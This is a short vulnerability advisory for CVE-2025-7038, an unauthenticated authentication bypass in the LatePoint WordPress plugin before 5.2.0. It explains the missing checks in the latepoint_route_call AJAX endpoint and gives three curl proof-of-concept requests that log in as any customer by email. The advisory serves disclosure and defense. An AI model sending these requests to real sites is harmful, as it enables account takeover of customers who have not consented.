LatePoint < 5.2.0 – Unauthenticated Authentication Bypass | CVE 2025-7038

Description

The plugin is vulnerable to Authentication Bypass due to insufficient identity verification within the steps__load_step route of the latepoint_route_call AJAX endpoint. The endpoint reads the client-supplied customer email and related customer fields before invoking the internal login handler without verifying login status, capability checks, or a valid AJAX nonce. This makes it possible for unauthenticated attackers to log into any customer’s account.

Proof of Concept

curl -v --url 'http://example.com/wp-admin/admin-ajax.php?action=latepoint_route_call' --data 'route_name=steps__load_step&params[current_step_code]=customer&params[customer][email]=customer@example.com'

curl -v --url 'https://example.com/' \
--data 'pre_route=a&route_name=steps__load_step&params[current_step_code]=customer&params[step_direction]=next&params[customer][email]=customer%40example.com&params[customer][first_name]=Test&params[customer][last_name]=User'

curl -v --url "http://example.com/wp-admin/admin-ajax.php?customer%5Bemail%5D=customer%40example.com&current_step_code=customer" --data 'action=latepoint_route_call&route_name=steps__load_step&params[step_direction]=next&params[customer][first_name]=Test&params[customer][last_name]=User'